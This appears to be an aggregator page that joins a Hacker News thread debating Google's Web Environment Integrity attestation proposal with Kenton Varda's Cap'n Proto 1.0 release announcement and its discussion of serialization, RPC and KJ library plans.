It's also worth noting that _even if_ Vivaldi implements WEI, there's a solid chance that the attestation authority (Google, Microsoft, Apple) or possibly the website itself[1] will not accept it as a valid environment at all! After all, what makes Vivaldi not a 'malicious or automated environment' in their eyes? What if Vivaldi allows full ad blocking extensions? User automation/scripting? Or any example of too much freedom to the user. Will the attestation authority decide that it is not worthy of being an acceptable environment?
[1] if this ends up spiralling out of control by allowing the full attestation chain to be inspected by the website
>But as a software creator, it's up to you to determine what is best for your customers.
Absolutely zero large web properties do anything based on what's best for users. If this gains traction, Google will simply deny adsense payments for impressions from an 'untrusted' page, and thus all the large players that show ads for revenue will immediately implement WEI without giving a single flying shit about the users, as they always have and always will.
The author should have asked 'Can we just implement it then?' because in some cases you literally can't implement the proposed API. That's the core issue with it. Unlike other contentious browser features, even if you wanted to implement attestation, it may be impossible to do so. More precisely, attestation may be impossible to implement on some platforms to the de facto standard that would develop over time. The de facto standard I refer to is the list of attestors web servers will accept. If your platform can't be attested by an approved attestor, you're screwed. That's why it's not that simple this time. The proposed attestation API is literally unimplementable in general. You can't implement it and you can't not implement it.
> If your only hope of not going along with this is having the EU come in and slapping Google's wrist, I'm concerned that you aren't willing to take a hard stance on your own.
This is indeed concerning. I'd like to see Brave's response to this, and we already know how Firefox has responded.
Someone argued yesterday that in instances like this users are choosing what to use of their own free will. At the micro scale sure, at the macro scale I disagree. Users want their shit to work and if you play these shenanigans it's less of a choice and more of a ransom.
Insects in a swarm can choose where to go but they can't choose where the swarm goes.
What sets WEI apart is that it, in a way, exerts power over your choice on how to implement other web features, for example whether you're allowed to block elements, or even just show a developer console.
Other than Encrypted Media Extensions (and these are much more constrained than WEI!), I don't know of any other web standard that does that.
Would this end up breaking curl, or any other tool that accesses https?
It will, but curl and others will likely simply be upgraded with a puppeteer of sorts that plugs into your Chrome runtime. So this will have prevented nothing (except forcing non-technical users to adopt Chrome and thus killing off new browser entrants, offering the chance to force-feed even more Google ads).
Yes and no.
The attestation API will allow websites to verify certain things about the user agent which they then may use to either deny access or alter the access for the requested resource. This is similar to existing methods of checking the 'User-Agent' header string but is much more robust to tampering because it can rely on a full-chain of trust from the owning website.
So will existing tools work with this?
Websites that do not require attestation should work fine. This will probably be the vast majority of websites.
Websites that require attestation may or may not work depending on the results of the attestation. Since programs like curl do not currently provide a mechanism to perform attestation, they will indicate a failure. If the website is configured to disallow failed attestation attempts, then tools like curl will no longer be able to access the same resources that user agents that pass attestation can.
My opinion is that it is likely that attestation will be used for any website where there is a large media presence (copyright/drm), large data presence (resource utilization/streams), high security, or any large company that is willing to completely segment its web resources into attested and non-attested versions. Tools like curl will no longer work with these sites until either a suitable attestation system is added to them, or the company changes its attestation policy.
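As a purely hypothetical sketch of what such a gate could look like on the server side - the header name, token transport, and verification helper below are all invented for illustration, since the proposal doesn't specify how a token would reach the server:

const http = require('http');

// Invented helper: a real deployment would validate the token's signature
// against the attester's published keys. Here we only check presence.
async function verifyWithAttester(token) {
  return typeof token === 'string' && token.length > 0;
}

http.createServer(async (req, res) => {
  const token = req.headers['x-environment-integrity']; // invented header name
  if (!(await verifyWithAttester(token))) {
    res.writeHead(403, { 'content-type': 'text/plain' });
    res.end('Attestation required\n'); // plain curl requests end up here
    return;
  }
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end('Welcome, attested client\n');
}).listen(8080);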
It's the insane power that companies like Google, Microsoft, and Apple hold over the tech world. It's like they can just dictate everything to suit their own interests, and it's the users who end up losing out.
Remember when Apple killed Flash? I heard it was because they wanted people to use their app store more instead of us playing games in the browser, so they could make more money. And Microsoft installing IE and setting it as the default browser? And now, Google is making changes to how we browse the web and adding things like Manifest v3, to boost their ad business.
The most irritating part is that it always gets packaged as being for our safety. The sad thing is I've often seen people even drink this user-safety kool-aid, especially with Apple (like restricting browser choices on mobile - not sure if it's changed now).
I really think there should be some laws in place to prevent this kind of behavior. It's not fair to us, the users, and we can't just rely on the EU to do it all the time.
> Remember when Apple killed Flash? I heard it was because they wanted people to use their app store more instead of us playing games in the browser, so they could make more money.
Even without the incentive of "moar profit$" they never entertained Flash because fundamentally, it sucked. When it landed in Android, it was a bloated mess that sucked the battery dry and was slow as molasses. On every platform it existed on, it was a usability and security nightmare. No, Apple "killed" Flash by making a sane decision not to allow it in their fledgling platform because Flash outright sucked, informed largely by the abhorrent performance on all platforms.
> And Microsoft installing IE and setting it as the default browser?
SMH. There was never an issue with Microsoft providing IE as a default initially - that came later with the EU. The biggest issue was that if an OEM (a Dell or an HP) struck a deal with Netscape to provide that as the default, Microsoft threatened to revoke the OEM's license to distribute Windows. In the late '90s and early '00s that would have been the death knell of an OEM. And that is the antitrust part. They abused their position as the number 1 desktop OS (by a significant margin) to take control of the then-nascent browser market.
> Remember when Apple killed Flash? I heard it was because they wanted people to use their app store more instead of us playing games in the browser, so they could make more money
The original iPhone which killed flash didn't even ship with the App Store. They assumed we'd only be using web apps.
It's in the original Steve Jobs presentation when he announced the iPhone.
> Remember when Apple killed Flash?
Yes. Every SECOPS person let out a collective sigh of relief when the weekly p0 patches for flash stopped coming. Apple may have been trying to push towards 'native' apps but that was almost certainly secondary; safari was leading the way on html5 APIs.
Let's not pretend that the death of Flash was a tragedy.
How exactly is WEI any worse than say a peep-hole on a door? At the end of the day bots are a huge problem and it's only getting worse. What's the alternative solution? You need to know who you're dealing with, both in life and clearly on the web.
I'm probably alone in this, but WEI is a good thing. Anyone who's run a site knows the headache around bots. Sites that don't care about bots can simply not use WEI. Of course, we know they will use it, because bots are a headache. Millions of engineer hours are wasted yearly on bot nonsense.
With the improvements in AI this was inevitable anyway. Anyone who thinks otherwise is delusional. Reap what you sow and what not.
edit: removing ssl comparison since it's not really my point to begin with
SSL is in practice only used for server certificates. It was kinda shit and a lot of people complained because of CAs, but then we got Let's Encrypt etc., which alleviated the situation. And the identity is only tied to domain control, unlike e.g. code signing certs, which are orders of magnitude more invasive and frankly a racket.
In either case, WEI has the potential to be proper DRM, like in the "approved devices" fashion. It's deeply invasive, and can be used to exclude any type of usage at the whim of mega corps, like screen readers, ad blocking, anti-tracking/fingerprinting, downloading copyrighted content, and anything new they can think of in the future. It's quite literally the gateway to making the web an App Store (or at best, multiple app stores).
> What's the alternative solution?
To what problem? Bots specifically or humans who want to use the web in any way they want?
If bots, then elaborate. Many bots are good, and ironically the vast majority of bot traffic comes from the very corporations that are behind this stuff. As for the really bad bots, we have IP blocklisting. For the gray/manipulative bots, sure, that's a problem. What makes you think that problem needs to be addressed with mandatory handcuffs for everyone else?
WEI is really about denying the user full control of their own device. If you give people full control of their devices, you will have bots. Do you believe eliminating bots is more important than general purpose computing?
A bot is just some computer doing what its owner wants. OP is happy because WEI will eliminate bots. OP is inconvenienced by other people using computers in ways they don't like, and wants to take control of the computer away.
As strong AI is knocking on the door, we see people wanting to take general purpose computing away. All the worst outcomes involve people losing the ability to control their own computers.
WEI is like requiring people to get their brain scanned before you let them visit your house. 'Sorry, I require a valid attestation from Google that you are a real human,' you say. Your friend now needs to drive down to the local Google® Privacy Invasion CenterTM and have all of their personal secrets exposed so Google can prove they are, in fact, not a robot. Except, oh no, Google found Linux in their brain scan! The horror! How dare they value their own freedom! Anyone who opposes spying from Chrome and/or Google Play Services is obviously a bot. Nothing to hide, nothing to fear, right? Your visitor, who is clearly not a bot, fails to obtain a valid attestation from Google. You deny them entry to your house.
You have lost an acquaintance.
SSL doesn't demand that some third party approve your software and hardware in order for it to work for you.
WEI and SSL/TLS are completely different.
TLS does not facilitate preventing you as a web site visitor from inspecting or modifying the web content served over it, e.g. by blocking ads or auto-playing videos. WEI does.
TLS* does not allow websites to restrict users from using the tech stack (hardware, OS, browser) that they want to use. This does.
SSL is the client verifying the server, and the client can thusly opt to skip or alter that in any way it sees fit. WEI is the reverse: the server validating the client, so the client has no choice to opt-out.
WEI won't even stop the bad bots. They will simply use 'legitimate' devices.
Yeah, sure, let's implement this dystopian nightmare technology to solve our little engineering problem.
> Anyone who's run a site knows the headache around bots. Sites that don't care about bots can simply not use WEI.
So is it a headache for all/most sites or is it not?
How would this prevent bots? It's very easy to set up a bot that's running Chrome on Android, or whatever environment is required. Bots can do whatever you tell them without complaining. This only prevents actual humans who want to use a non-mainstream browser, or use add-ons to help them browse, or use a non-mainstream operating system or device.
Anyone using a browser without this feature will end up becoming second class citizens who must jump through (extreme) hoops to use the web...
Or they're just walled off from most of the web entirely.
I use a variety of personally developed web scraper scripts. For instance, I have digital copies of every paystub. These will almost all become worthless. My retirement plan at a previous employer would not let me download monthly statements unless I did it manually... it was able to detect the Mechanize library, and responded with some creepy-assed warning against robots.
No one would go to the trouble to do that manually every month, and no one was allowed robots apparently. But at least they needed to install some specialty software somewhere to disallow it. This shit will just make it even easier for the assholes.
I also worry about tools I sometimes use for things like Selenium.
This isn't SSL.
Bots will get sophisticated.
This all seems to me that in a decade we'll be having the same discussion, with the same excuse, but eventually the proposal from big corporations will be to require plugging-in a government-issued ID card into a smartcard reader in order to access pre-approved websites with pre-approved client portals running in pre-approved machines.
WEI doesn't prevent bots. Bots would just need to script an attested browser via tools like AutoHotKey -- the only way WEI would prevent bots would be by preventing you from running the browser on an operating system without 3rd party software installed. WEI is a 2 or 3 month roadbump for bot builders.
WEI does prevent any customization.
I think your comparison to SSL is actually important, because encryption is a discrete problem with a discrete solution. But this WEI proposal is designed to detect botting, which is a cat and mouse problem without a clear end game.
> It is also interesting to note that the first use case listed is about ensuring that interactions with ads are genuine.
That's just the beginning. Attestation will eventually allow advertisers to demand that the user is present and looking at the screen, like in the Black Mirror episode Fifteen Million Merits.
Sony already owns a patent on that exact scenario from Black Mirror.
https://www.creativebloq.com/sony-tv-patent
> In it, TV viewers are only able to skip an advert by shouting the name of the brand. Yep, crying 'McDonald's!' is the only way to make the Big Mac disappear.
Companies will do the most insane, terrible things if not stopped. This will happen.
Can't wait till we've added another turtle to the stack with a full browser engine implemented in WASM running in a host browser that is mandatory for all media sites.
On android, some video ads will even pause if you pull down the notification bar.
There's a lot of moral outrage regarding this proposal, rightfully so. In fact, it should be further intensified. But apart from that, I don't think this proposal will work in any case.
When implemented without holdouts (closed loop), you do have a tight DRM web, which will attract legislators. Or so we hope.
When implemented with holdouts, it's barely useful to websites since they still need the backup mechanisms to detect fraud that they have anyway. If they need to keep it around, might as well use that as singular solution which has the added 'benefit' of collecting way more personal data.
>it's barely useful to websites since they still need the backup mechanisms to detect fraud that they have anyway.
Remember, this was never for individual websites. It's strictly a measure to protect Google's ad business.
How about adding a fair rule to the standard, that an attester cannot attest its own products? I wonder how long it would take for Microsoft or Apple to attest google.com as a trustworthy website?
The attestation is about the device, not the website.
I think just from a security perspective it makes most sense for the device or os manufacturer to handle attestation for that device.
719 points 4 days ago by kentonv in 1939th position
capnproto.org | Estimated reading time – 10 minutes | comments | anchor
kentonv on 28 Jul 2023
It's been a little over ten years since the first release of Cap'n Proto, on April 1, 2013. Today I'm releasing version 1.0 of Cap'n Proto's C++ reference implementation.
Don't get too excited! There's not actually much new. Frankly, I should have declared 1.0 a long time ago – probably around version 0.6 (in 2017) or maybe even 0.5 (in 2014). I didn't mostly because there were a few advanced features (like three-party handoff, or shared-memory RPC) that I always felt like I wanted to finish before 1.0, but they just kept not reaching the top of my priority list. But the reality is that Cap'n Proto has been relied upon in production for a long time. In fact, you are using Cap'n Proto right now, to view this site, which is served by Cloudflare, which uses Cap'n Proto extensively (and is also my employer, although they used Cap'n Proto before they hired me). Cap'n Proto is used to encode millions (maybe billions) of messages and gigabits (maybe terabits) of data every single second of every day. As for those still-missing features, the real world has seemingly proven that they aren't actually that important. (I still do want to complete them though.)
Ironically, the thing that finally motivated the 1.0 release is so that we can start working on 2.0. But again here, don't get too excited! Cap'n Proto 2.0 is not slated to be a revolutionary change. Rather, there are a number of changes we (the Cloudflare Workers team) would like to make to Cap'n Proto's C++ API, and its companion, the KJ C++ toolkit library. Over the ten years these libraries have been available, I have kept their APIs pretty stable, despite being 0.x versioned. But for 2.0, we want to make some sweeping backwards-incompatible changes, in order to fix some footguns and improve developer experience for those on our team.
Some users probably won't want to keep up with these changes. Hence, I'm releasing 1.0 now as a sort of "long-term support" release. We'll backport bugfixes as appropriate to the 1.0 branch for the long term, so that people who aren't interested in changes can just stick with it.
Again, not a whole lot has changed since the last version, 0.10. But there are a few things worth mentioning:
A number of optimizations were made to improve performance of Cap'n Proto RPC. These include reducing the amount of memory allocation done by the RPC implementation and KJ I/O framework, adding the ability to elide certain messages from the RPC protocol to reduce traffic, and doing better buffering of small messages that are sent and received together to reduce syscalls. These are incremental improvements.
Breaking change: Previously, servers could opt into allowing RPC cancellation by calling context.allowCancellation() after a call was delivered. In 1.0, opting into cancellation is instead accomplished using an annotation on the schema (the allowCancellation annotation defined in c++.capnp). We made this change after observing that in practice, we almost always wanted to allow cancellation, but we almost always forgot to do so. The schema-level annotation can be set on a whole file at a time, which is easier not to forget. Moreover, the dynamic opt-in required a lot of bookkeeping that had a noticeable performance impact in practice; switching to the annotation provided a performance boost. For users that never used context.allowCancellation() in the first place, there's no need to change anything when upgrading to 1.0 – cancellation is still disallowed by default. (If you are affected, you will see a compile error. If there's no compile error, you have nothing to worry about.)
KJ now uses kqueue() to handle asynchronous I/O on systems that have it (MacOS and BSD derivatives). KJ has historically always used epoll on Linux, but until now had used a slower poll()-based approach on other Unix-like platforms.
KJ's HTTP client and server implementations now support the CONNECT method.
A new class capnp::RevocableServer was introduced to assist in exporting RPC wrappers around objects whose lifetimes are not controlled by the wrapper. Previously, avoiding use-after-free bugs in such scenarios was tricky.
Many, many smaller bug fixes and improvements. See the PR history for details.
The changes we have in mind for version 2.0 of Cap'n Proto's C++ implementation are mostly NOT related to the protocol itself, but rather to the C++ API and especially to KJ, the C++ toolkit library that comes with Cap'n Proto. These changes are motivated by our experience building a large codebase on top of KJ: namely, the Cloudflare Workers runtime, workerd.
KJ is a C++ toolkit library, arguably comparable to things like Boost, Google's Abseil, or Facebook's Folly. I started building KJ at the same time as Cap'n Proto in 2013, at a time when C++11 was very new and most libraries were not really designing around it yet. The intent was never to create a new standard library, but rather to address specific needs I had at the time. But over many years, I ended up building a lot of stuff. By the time I joined Cloudflare and started the Workers Runtime, KJ already featured a powerful async I/O framework, HTTP implementation, TLS bindings, and more.
Of course, KJ has nowhere near as much stuff as Boost or Abseil, and nowhere near as much engineering effort behind it. You might argue, therefore, that it would have been better to choose one of those libraries to build on. However, KJ had a huge advantage: that we own it, and can shape it to fit our specific needs, without having to fight with anyone to get those changes upstreamed.
One example among many: KJ's HTTP implementation features the ability to "suspend" the state of an HTTP connection, after receiving headers, and transfer it to a different thread or process to be resumed. This is an unusual thing to want, but is something we needed for resource management in the Workers Runtime. Implementing this required some deep surgery in KJ HTTP and definitely adds complexity. If we had been using someone else's HTTP library, would they have let us upstream such a change?
That said, even though we own KJ, we've still tried to avoid making any change that breaks third-party users, and this has held back some changes that would probably benefit Cloudflare Workers. We have therefore decided to "fork" it. Version 2.0 is that fork.
Development of version 2.0 will take place on Cap'n Proto's new v2 branch. The master branch will become the 1.0 LTS branch, so that existing projects which track master are not disrupted by our changes.
We don't yet know all the changes we want to make as we've only just started thinking seriously about it. But, here's some ideas we've had so far:
We will require a compiler with support for C++20, or maybe even C++23. Cap'n Proto 1.0 only requires C++14.
In particular, we will require a compiler that supports C++20 coroutines, as lots of KJ async code will be refactored to rely on coroutines. This should both make the code clearer and improve performance by reducing memory allocations. However, coroutine support is still spotty – as of this writing, GCC seems to ICE on KJ's coroutine implementation.
Cap'n Proto's RPC API, KJ's HTTP APIs, and others are likely to be revised to make them more coroutine-friendly.
kj::Maybe will become more ergonomic. It will no longer overload nullptr to represent the absence of a value; we will introduce kj::none instead. KJ_IF_MAYBE will no longer produce a pointer, but instead a reference (a trick that becomes possible by utilizing C++17 features).
We will drop support for compiling with exceptions disabled. KJ's coding style uses exceptions as a form of software fault isolation, or "catchable panics", such that errors can cause the "current task" to fail out without disrupting other tasks running concurrently. In practice, this ends up affecting every part of how KJ-style code is written. And yet, since the beginning, KJ and Cap'n Proto have been designed to accommodate environments where exceptions are turned off at compile time, using an elaborate system to fall back to callbacks and distinguish between fatal and non-fatal exceptions. In practice, maintaining this ability has been a drag on development – no-exceptions mode is constantly broken and must be tediously fixed before each release. Even when the tests are passing, it's likely that a lot of KJ's functionality realistically cannot be used in no-exceptions mode due to bugs and fragility. Today, I would strongly recommend against anyone using this mode except maybe for the most basic use of Cap'n Proto's serialization layer. Meanwhile, though, I'm honestly not sure if anyone uses this mode at all! In theory I would expect many people do, since many people choose to use C++ with exceptions disabled, but I've never actually received a single question or bug report related to it. It seems very likely that this was wasted effort all along. By removing support, we can simplify a lot of stuff and probably do releases more frequently going forward.
Similarly, we'll drop support for no-RTTI mode and other exotic modes that are a maintenance burden.
We may revise KJ's approach to reference counting, as the current design has proven to be unintuitive to many users.
We will fix a longstanding design flaw in kj::AsyncOutputStream, where EOF is currently signaled by destroying the stream. Instead, we'll add an explicit end() method that returns a Promise. Destroying the stream without calling end() will signal an erroneous disconnect. (There are several other aesthetic improvements I'd like to make to the KJ stream APIs as well.)
We may want to redesign several core I/O APIs to be a better fit for Linux's new-ish io_uring event notification paradigm.
The RPC implementation may switch to allowing cancellation by default. As discussed above, this is opt-in today, but in practice I find it's almost always desirable, and disallowing it can lead to subtle problems.
And so on.
It's worth noting that at present, there is no plan to make any backwards-incompatible changes to the serialization format or RPC protocol. The changes being discussed only affect the C++ API. Applications written in other languages are completely unaffected by all this.
It's likely that a formal 2.0 release will not happen for some time – probably a few years. I want to make sure we get through all the really big breaking changes we want to make, before we inflict update pain on most users. Of course, if you're willing to accept breakages, you can always track the v2 branch. Cloudflare Workers releases from v2 twice a week, so it should always be in good working order.
For context: Kenton ran Google's in house proto system for many years, before leaving and building his own open source version.
I know this isn't new, but I wonder if the name is an intentional nod to Star Trek Voyager or is there another reference I'm not aware of.
Given that it's billed as a 'cerealization protocol', I always assumed it was a reference to Cap'n Crunch cereal.
Huh, that reference actually never occurred to me.
The name Cap'n Proto actually originally meant 'Capabilities and Protobufs' -- it was a capability-based RPC protocol based on Protocol Buffers. However, early on I decided I wanted to try a whole different serialization format instead. 'Proto' still makes sense, since it is a protocol, so I kept the name.
The pun 'cerealization protocol' is actually something someone else had to point out to me, but I promptly added it to the logo. :)
If any cloudflare employees end up here who helped decide on Capn Proto over other stuff (e.g. protobuf), what considerations went into that choice? I'm curious if the reasons will be things important to me, or things that you don't need to worry about unless you deal with huge scale.
I don't work at Cloudflare but follow their work and occasionally work on performance sensitive projects.
If I had to guess, they looked at the landscape a bit like I do and regarded Cap'n Proto, flatbuffers, SBE, etc. as being in one category apart from other data formats like Avro, protobuf, and the like.
So once you're committed to record'ish shaped (rather than columnar like Parquet) data that has an upfront parse time of zero (nominally, there could be marshalling if you transmogrify the field values on read), the list gets pretty short.
https://capnproto.org/news/2014-06-17-capnproto-flatbuffers-... goes into some of the trade-offs here.
Cap'n Proto was originally made for https://sandstorm.io/. That work (which Kenton has presumably done at Cloudflare since he's been employed there) eventually turned into Cloudflare workers.
Another consideration: https://github.com/google/flatbuffers/issues/2#issuecomment-...
To summarize something from a little over a year after I joined there: Cloudflare was building out a way to ship logs from its edge to a central point for customer analytics and serving logs to enterprise customers. As I understood it, the primary engineer who built all of that out, Albert Strasheim, benchmarked the most likely serialization options available and found Cap'n Proto to be appreciably faster than protobuf. It had a great C++ implementation (which we could use from nginx, IIRC with some lua involved) and while the Go implementation, which we used on the consuming side, had its warts, folks were able to fix the key parts that needed attention.
Anyway. Cloudflare's always been pretty cost efficient machine wise, so it was a natural choice given the performance needs we had. In my time in the data team there, Cap'n Proto was always pretty easy to work with, and sharing proto definitions from a central schema repo worked pretty well, too. Thanks for your work, Kenton!
Here's a blog post about Cloudflare's use of Cap'n Proto in 2014, three years before I joined: https://blog.cloudflare.com/introducing-lua-capnproto-better...
To this day, Cloudflare's data pipeline (which produces logs and analytics from the edge) is largely based on Cap'n Proto serialization. I haven't personally been much involved with that project.
As for Cloudflare Workers, of course, I started the project, so I used my stuff. Probably not the justification you're looking for. :)
That said, I would argue the extreme expressiveness of Cap'n Proto's RPC protocol compared to alternatives has been a big help in implementing sandboxing in the Workers Runtime, as well as distributed systems features like Durable Objects. https://blog.cloudflare.com/introducing-workers-durable-obje...
The lead dev of Cloudflare workers is the creator of Cap'n Proto so that likely made it an easy choice
Congrats in 10 years! Question: Can Cap'n Proto be used as an alternative to Python Pickle library for serializing and de-serializing python object structures?
If your goal is to serialize an arbitrary Python object, Pickle is the way to go. Cap'n Proto requires you to define a schema, in Cap'n Proto schema language, for whatever you want to serialize. It can't just take an arbitrary Python value.
Great achievement. To be honest I wouldn't recommend Capnp. The C++ API is very awkward.
The zero copy parsing is less of a benefit than you'd expect - pretty unlikely you're going to want to keep your data as a Capnp data structure because of how awkward it is to use. 99% of the time you'll just copy it into your own data structures anyway.
There's also more friction with the rest of the world which has more or less settled on Protobuf as the most popular binary implementation of this sort of idea.
I only used it for serialisation. Maybe the RPC stuff is more compelling.
I really wish Thrift had taken off instead of Protobuf/gRPC. It was so much better designed and more flexible than anything I've seen before or since. I think it died mainly due to terrible documentation. I guess it also didn't have a big name behind it.
I find MessagePack to be pretty great if you don't need schema. JSON serialization is unreasonably fast in V8 though and even message pack can't beat it; though it's often faster in other languages and saves on bytes.
I do agree that the API required for zero-copy turns out a bit awkward, particularly on the writing side. The reading side doesn't look much different. Meanwhile zero-copy is really only a paradigm shift in certain scenarios, like when used with mmap(). For network communications it doesn't change much unless you are doing something hardcore like RDMA. I've always wanted to add an optional alternative API to Cap'n Proto that uses 'plain old C structures' (or something close to it) with one-copy serialization (just like protobuf) for the use cases where zero-copy doesn't really matter. But haven't gotten around to it yet...
That said I personally have always been much more excited about the RPC protocol than the serialization. I think the RPC protocol is actually a paradigm shift for almost any non-trivial use case.
You mean flatbuffers, not protobuf.
It has established itself as the de-facto standard, with a few other places using SBE instead.
In any case the main problems with binary serialization are:
- schemas and message version management
- delta-encoding
If you ignore these, flat binary serialization is trivial.
No library provides a good solution that covers the two points above.
Tell me about your uses of capn proto.
I'm using Cap'n Proto for serialization in a message broker application (LucidMQ) I'm building. It has allowed me to create client applications rather quickly. There are some quirks that can be difficult to wrap your head around, but once you understand them it is really solid.
There are some differences between the language libraries, and documentation can be lacking around those language-specific solutions. I'm hoping to add blog articles and/or contribute back to the examples in these repositories to help future users who want to dabble.
Check out my repo here for how I use it across Rust and Python, with Golang coming soon: https://github.com/lucidmq/lucidmq
I have some very unfortunate news to share with the Cap'n Proto and Sandstorm communities.
Ian Denhardt (zenhack on HN), a lead contributor to the Go implementation, suddenly and unexpectedly passed away a few weeks ago. Before making a request to the community, I want to express how deeply saddened I am by this loss. Ian and I collaborated extensively over the past three years, and we had become friends.
As the de facto project lead, it now befalls me to fill Ian's very big shoes. Please, if you're able to contribute to the project, I could really use the help. And if you're a contributor or maintainer of some other implementation (C++, Rust, etc.), I would *REALLY* appreciate it if we could connect. I'm going to need to surround myself with very smart people if I am to continue Ian's work.
RIP Ian, and thank you. I learned so much working with you.
------
P.S: I can be reached in the following places
- https://github.com/lthibault
- https://matrix.to/#/#go-capnp:matrix.org
- Telegram: @lthibault
- gmail: louist87
I'm so sad to hear this. I didn't know him but hugely admired the work he did on Tempest (his recent fork of Sandstorm, attempting to revive the project). Thank you for letting us know.
Oh gosh, I didn't know that. Thank you for sharing :( I really loved his blog. That's awful.
I've had a couple people suddenly taken from me, and it is soul crushing. Every time it happens it reminds me of how fragile life is, and how quickly things can change. I've started trying to enjoy the small things in life more, and while I don't neglect the future, I also try to enjoy the present.
He has left an amazing legacy that has touched a lot of people. RIP Ian.
That is really sad news. Ian was an inspiration. Sorry for your loss and the loss of the whole community. He will be greatly missed.
I'm excited by Cap'n Proto's participation in the OCAPN standardization effort. Can you speak to if that's going to be part of the Cap'n Proto 2.0 work?
Sadly, the person leading that participation, Ian 'zenhack' Denhardt, recently and unexpectedly passed away.
For my part, I'm a fan of OCapN, but I am not sure how much time I can personally commit to it, with everything on my plate.
I wish I had better news here. This was a tragic loss for all of us.
It's a testament to the subtlety of software engineering that even after four tries (protobuf 1-3, capn proto 1) there are still breaking changes that need to be made to the solution of what on the surface appears to be a relatively constrained problem.
Of course, nothing is ever 'solved'. :)
I assume you are talking about the cancellation change. This is interesting, actually. When originally designing Cap'n Proto, I was convinced by a capabilities expert I talked to that cancellation should be considered dangerous, because software that isn't expecting it might be vulnerable to attacks if cancellation occurs at an unexpected place. Especially in a language like C++, which lacks garbage collection or borrow checking, you might expect use-after-free to be a big issue. I found the argument compelling.
In practice, though, I've found the opposite: In a language with explicit lifetimes, and with KJ's particular approach to Promises (used to handle async tasks in Cap'n Proto's C++ implementation), cancellation safety is a natural side-effect of writing code to have correct lifetimes. You have to make cancellation safe because you have to cancel tasks all the time when the objects they depend on are going to be destroyed. Moreover, in a fault-tolerant distributed system, you have to assume any code might not complete, e.g. due to a power outage or maybe just throwing an unexpected exception in the middle, and you have to program defensively for that anyway. This all becomes second-nature pretty quick.
So all our code ends up cancellation-safe by default. We end up with way more problems from cancellation unexpectedly being prevented when we need it, than happening when we didn't expect it.
EDIT: Re-reading, maybe you were referring to the breaking changes slated for 2.0. But those are primarily changes to the KJ toolkit library, not Cap'n Proto, and are all about API design... I'd say API design is not a constrained problem.
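On the cancellation point: KJ is C++, but the same "cancellation-safe by construction" pattern can be sketched in Python's asyncio, where cancelling a task raises at its current await point and cleanup is written so any interruption is safe (the temp-file resource here is purely hypothetical):

    import asyncio
    import tempfile


    async def worker(queue: asyncio.Queue) -> None:
        # A hypothetical resource that must be released no matter how we exit.
        log = tempfile.TemporaryFile()
        try:
            while True:
                item = await queue.get()   # cancellation can land on any await
                log.write(repr(item).encode())
        finally:
            # Runs on normal exit, on an exception, or on cancellation,
            # so being cancelled at an arbitrary point stays safe.
            log.close()


    async def main() -> None:
        queue: asyncio.Queue = asyncio.Queue()
        task = asyncio.create_task(worker(queue))
        await queue.put("hello")
        await asyncio.sleep(0)   # let the worker run once
        task.cancel()            # roughly analogous to dropping a KJ promise
        try:
            await task
        except asyncio.CancelledError:
            pass


    asyncio.run(main())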
Any plans to improve the Rust side of things? The API could definitely use some more work/ docs around it.
I intend to continue work on capnproto-rust, at my own pace and according to my own priorities.
Are there any particular pain points that you want to call attention to?
We have a great plethora of binary serialization libraries now, but I've noticed none of them offer the following:
* Specification of the number of bits I want to cap out a field at during serialization, ie: `int` that only uses 3 bits.
* Delta encoding for serialization and deserialization, this would further decrease the size of each message if there is an older message that I can use as the initial message to delta encode/decode from.
Take a look at FAST protocol [1]. It has been around for a while. Was created for market/trading data. There appears to be some open source implementations, but I don't think in general they'd be maintained well since trading is, well, secretive.
> `int` that only uses 3 bits.
CBOR approximates this, since it has several different widths for integers.
> an older message that I can use as the initial message to delta encode/decode from.
General-purpose compression on the encoded stream would do something toward this goal, but some protocol buffers library implementations offer merge functions. The question is what semantics of 'merge' you expect. For repeated fields do you want to append or clobber?
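On the CBOR point above, a quick sketch (assuming the cbor2 package) showing that the encoded size grows with the integer's magnitude rather than being fixed by a declared type:

    import cbor2  # assumes the cbor2 package is installed

    # CBOR picks the smallest integer encoding that fits the value:
    # 0..23 live in the initial byte; bigger values add 1, 2, 4 or 8 bytes.
    for value in (7, 200, 70_000, 5_000_000_000):
        print(value, len(cbor2.dumps(value)))
    # Expected sizes are roughly 1, 2, 5 and 9 bytes respectively.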
One thing I liked about Ada, the small amount I used it, is it has actual subtypes: you could define a variable as an integer within a specific range, and the compiler would (presumably) choose an appropriate underlying storage type for it.
Most formats use varints, so you can't have a 3-bit int but they will store a 64-bit int in one byte if it fits. Going to smaller than a byte isn't worth the extra complexity and slowness. If you're that space sensitive you need to add proper compression.
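For reference, here is a minimal sketch of the protobuf-style varint scheme being described; it shows the general idea, not any particular library's internals:

    def encode_varint(value: int) -> bytes:
        """Encode a non-negative int using 7 bits per byte; high bit = 'more follows'."""
        out = bytearray()
        while True:
            byte = value & 0x7F
            value >>= 7
            if value:
                out.append(byte | 0x80)
            else:
                out.append(byte)
                return bytes(out)


    def decode_varint(data: bytes) -> int:
        result = 0
        for shift, byte in enumerate(data):
            result |= (byte & 0x7F) << (7 * shift)
            if not byte & 0x80:
                return result
        raise ValueError("truncated varint")


    assert len(encode_varint(5)) == 1            # small values fit in one byte
    assert len(encode_varint(2**40)) == 6        # bigger values take more bytes
    assert decode_varint(encode_varint(300)) == 300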
By delta compression you mean across messages? Yeah I've never seen that but it's hard to imagine a scenario where it would be useful and worth the insane complexity.
zserio [1] has the former at least. It isn't intended for the same use cases as protobuf/capnproto/flatbuffers though; in particular it has no backwards or forwards compatibility. But it's great for situations where you know exactly what software is used on both ends and you need small data and fast en-/decoding.
[1] http://zserio.org/doc/ZserioLanguageOverview.html#bit-field-...
I find it surprising how few protocols (besides Cap'n Proto) have promise pipelining. The only other example I can think of is 9p, but that's not a general purpose protocol.
https://capnproto.org/news/2013-12-13-promise-pipelining-cap...
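For readers new to the idea, here is a rough conceptual sketch of what pipelining buys; the stubs below are hypothetical and are not the API of Cap'n Proto or any other library:

    # Hypothetical stubs, for illustration only.

    class RemotePromise:
        """Stands in for a server-side result that has not been returned yet."""

        def __init__(self, rpc, call_id):
            self.rpc = rpc
            self.call_id = call_id

        def call(self, method, *args):
            # Send a follow-up request that refers to the *pending* result by
            # its call id, instead of waiting for that result to come back.
            return self.rpc.send(method, args, target=("pending", self.call_id))


    # Without pipelining, two dependent calls cost two round trips:
    #   user = await directory.lookup("alice")    # round trip 1
    #   photo = await user.get_photo()            # round trip 2
    #
    # With pipelining, both requests leave immediately and the server applies
    # get_photo() to lookup()'s result as soon as it resolves:
    #   user_promise = directory.lookup("alice")          # no await
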